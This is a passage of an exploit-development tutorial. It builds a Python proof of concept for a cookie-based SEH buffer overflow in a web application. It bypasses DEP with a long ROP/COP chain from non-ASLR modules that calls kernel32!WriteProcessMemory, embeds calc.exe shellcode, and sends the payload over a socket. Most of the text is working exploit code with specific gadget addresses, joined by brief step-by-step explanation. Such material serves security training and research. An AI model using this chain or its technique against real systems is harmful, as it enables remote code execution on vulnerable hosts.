crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Loading kernel32!WriteProcessMemory parameter placeholder location into EAX to be dereferenced
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Extracting kernel32!WriteProcessMemory parameter placeholder
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)


# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

Now that we have an updated POC, let’s use a ROP routine to subtract this value from EAX.

# Preparing EDX by clearing it out
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Beginning calculations for EBX
crash += struct.pack('<L', 0x100141c8)    # pop ebx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd2d)    # Negative distance to kernel32!WriteProcessMemory

# Transferring EBX to EDX
crash += struct.pack('<L', 0x10022c1e)    # add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Compensating for above ROP gadget

# Placing kernel32!WriteProcessMemory into EAX
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# ROP gadget compensations
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget

The above routine will do the following:

  1. Zero out EDX
  2. Place the offset into EBX
  3. Move the offset to EDX
  4. Subtract the offset from EDX and EAX - placing the result in EAX

The negative distance between the two kernel32.dll pointers is loaded into EBX.

The distance is then loaded into EDX.

Program execution then reaches the sub eax, edx instruction.

This allows us to successfully extract kernel32!WriteProcessMemory!

Perfect! All there is left to do now is use our arbitrary write primitive to overwrite the kernel32WriteProcessMemory parameter placeholder on the stack with the actual address of kernel32!WriteProcessMemory.

If you can recall, we already decremented ECX to make it contain the address of the parameter placeholder. However, the ROP gadget we will use for our arbitrary write, does so with ECX at an offset of 0x8. To compensate for this, we will decrement ECX by 0x8 bytes. This way, when the arbitrary write gadget adds 0x8 to ECX, we will have already compensated.

crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

After we decrement ECX, we will use the arbitrary write gadget.

# Overwriting kernel32!WriteProcessMemory parameter placeholder with actual address of kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution reaches the arbitrary write - and we can see we will be overwriting our parameter placeholder - as intended.

The arbitrary write occurs, and we have successfully dynamically placed our parameters on the stack!

Now that everything has been configured properly, the final goal is to kick off this function call. To do so, we will need to load the stack address which points to kernel32!WriteProcessMemory into ESP - and return into it.

Currently, after the ECX manipulation, ECX contains a stack address 0x8 bytes above the stack address we want to load into ESP (this was due to compensation for the ECX + 0x8 arbitrary write ROP gadget). This means we want to increase ECX to contain the address on the stack in question.

The goal now will be to:

  1. Set ECX equal to the stack address pointing to kernel32!WriteProcessMemory
  2. Load ECX into EAX
  3. Exchange EAX and ESP, then return into ESP

Our last ROP routine can solve this issue!

crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Moving ECX into EAX
crash += struct.pack('<L', 0x1001fa0d)    # mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Exchanging EAX with ESP to fire off the call to kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x61c07ff8)    # xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled module)

Let’s also add some breakpoints to “mimic” shellcode - directly after the xchg eax, esp ROP gadget.


# NOPs before shellcode
crash += "\x90" * 230

# Breakpoints
crash += "\xCC" * 200

Running the updated POC - we can see that the call to kernel32!WriteProcessMemory is complete - and that we have hit our breakpoints!

Here is the final PoC, with calc.exe shellcode.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain

# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)    # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP gadget which moves EAX into EAX via "leave")
crash += struct.pack('<L', 0x10018606)    # pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)    # Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)    # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)    # add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)    # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)    # add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x1004d1ec)    # Pointer to kernel32!GetStartupInfoA (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

# Starting with lpBuffer (shellcode location)
# ECX currently points to lpBuffer placeholder parameter location - 0x18
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before shellcode)
crash += struct.pack('<L', 0x1001fce9)    # pop esi ; add esp + 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)    # Shellcode is about negative 0xfffffd44 bytes away from EAX
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)    # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget

# Changing lpBuffer placeholder to actual address of shellcode
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# nSize parameter (0x180 = 384 bytes)
crash += struct.pack('<L', 0x100103ff)    # pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)    # add esp, 0x8 ; ret: ImageLoadl.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Incrementing ECX to place the nSize parameter placeholder into ECX
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing nSize parameter placeholder to actual value of 0x180 (in EDX)
crash += struct.pack('<L', 0x1001f5b4)    # mov dword ptr [ecx], edx

# ECX currently is located at kernel32!WriteProcessMemory parameter placeholder - 0x8
# Need to first extract sqlite3.dll pointer (which is a pointer to kernel32) and then calculate offset from kernel32!GetStartupInfoA

# ECX = kernel32!WriteProcessMemory parameter placeholder + 0x14 (20)
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by 0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Extracting pointer to kernel32.dll into EAX

# EDX contains a value of 0x180 from nSize parameter
# EDI still contains return to stack ROP gadget for COP gadget compensation
# EAX is 0x260 bytes ahead of the kernel32!WriteProcessMemory parameter placeholder
# Subtracting 0x260 from EAX via EDX register
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Loading kernel32!WriteProcessMemory parameter placeholder location into EAX to be dereferenced
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Extracting kernel32!WriteProcessMemory parameter placeholder

crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory is negative fffffd2d bytes away from kernel32!GetStartupInfoA (which is in the virtual parameter placeholder currently)
# Popping 0xfffffd2d into EBX (which will be transferred into EDX. After value is in EDX, it will be added to EAX via EDX)

# Preparing EDX by clearing it out
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Beginning calculations for EBX
crash += struct.pack('<L', 0x100141c8)    # pop ebx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd2d)    # Negative distance to kernel32!WriteProcessMemory from kernel32!GetStartupInfoA

# Transferring EBX to EDX
crash += struct.pack('<L', 0x10022c1e)    # add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Compensating for above ROP gadget

# Placing kernel32!WriteProcessMemory into EAX
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# ROP gadget compensations
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget

# Writing kernel32!WriteProcessMemory address to kernel32!WriteProcessMemory parameter placeholder

# Gadget to overwrite kernel32!VirtualParameter placeholder will do so at an offset of ECX + 0x8. Compensating for that now
# First, decrementing ECX by 0x8
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Overwriting kernel32!WriteProcessMemory parameter placeholder with actual address of kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# The goal now is to load the address pointing to kernel32!WriteProcessMemory in ESP
# ECX contains an address + 0x8 bytes behind the kernel32!WriteProcessMemory pointer on the stack
# Increasing ECX by 8 bytes, moving it into EAX, and then exchanging EAX with ESP to fire off the ROP chain!
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Moving ECX into EAX
crash += struct.pack('<L', 0x1001fa0d)    # mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Exchanging EAX with ESP to fire off the call to kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x61c07ff8)    # xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled module)


# NOPs before shellcode
crash += "\x90" * 230

# calc.exe
# 195 bytes

crash += ("\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"
"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"
"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"
"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"
"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"
"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"
"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"
"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"
"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"
"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"
"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"
"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"
"\x52\xff\xd0")

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
